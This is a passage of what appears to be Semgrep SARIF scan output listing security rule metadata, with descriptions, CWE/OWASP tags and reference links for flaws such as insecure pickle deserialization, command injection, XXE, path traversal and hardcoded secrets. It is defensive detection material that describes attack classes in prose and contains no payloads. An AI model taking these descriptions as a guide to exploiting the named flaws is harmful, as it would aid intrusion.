(HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token","id":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","name":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.axios.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"help":{"markdown":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn)\n - [http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html](http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html)\n","text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"helpUri":"https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","id":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","name":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"help":{"markdown":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use)\n - [https://www.php.net/manual/en/intro.ftp.php](https://www.php.net/manual/en/intro.ftp.php)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php)\n","text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"helpUri":"https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use","id":"php.lang.security.ftp-use.ftp-use","name":"php.lang.security.ftp-use.ftp-use","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.ftp-use.ftp-use"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask)\n - [https://docs.python.org/3/library/os.html#os.environ](https://docs.python.org/3/library/os.html#os.environ)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","id":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","name":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"help":{"markdown":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied)\n - [https://go101.org/article/concurrent-common-mistakes.html](https://go101.org/article/concurrent-common-mistakes.html)\n","text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"helpUri":"https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","id":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","name":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled)\n - [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/)\n","text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","id":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","name":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","id":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","name":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"help":{"markdown":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods)\n - [https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb](https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb)\n","text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","id":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","name":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","id":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","name":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"help":{"markdown":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","id":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","name":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"help":{"markdown":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n - [https://eprint.iacr.org/2016/759.pdf](https://eprint.iacr.org/2016/759.pdf)\n - [https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf](https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf)\n - [https://datatracker.ietf.org/doc/html/rfc9106#section-4](https://datatracker.ietf.org/doc/html/rfc9106#section-4)\n","text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"helpUri":"https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","id":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","name":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC777 tokensReceived() reentrancy"},"help":{"markdown":"ERC777 tokensReceived() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy)\n - [https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0](https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0)\n - [https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f](https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f)\n","text":"ERC777 tokensReceived() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy","id":"solidity.security.erc777-reentrancy.erc777-reentrancy","name":"solidity.security.erc777-reentrancy.erc777-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc777-reentrancy.erc777-reentrancy"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"help":{"markdown":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md)\n - [https://owasp.org/www-community/attacks/HTTP_Response_Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting)\n","text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection","id":"generic.nginx.security.header-injection.header-injection","name":"generic.nginx.security.header-injection.header-injection","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.header-injection.header-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"help":{"markdown":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization)\n - [https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution](https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution)\n","text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","id":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","name":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","id":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","name":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-empty-password.node-mssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","id":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","name":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe","id":"java.lang.security.xxe.validator-xxe.validator-xxe","name":"java.lang.security.xxe.validator-xxe.validator-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.validator-xxe.validator-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename","id":"javascript.express.express-fs-filename.express-fs-filename","name":"javascript.express.express-fs-filename.express-fs-filename","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: 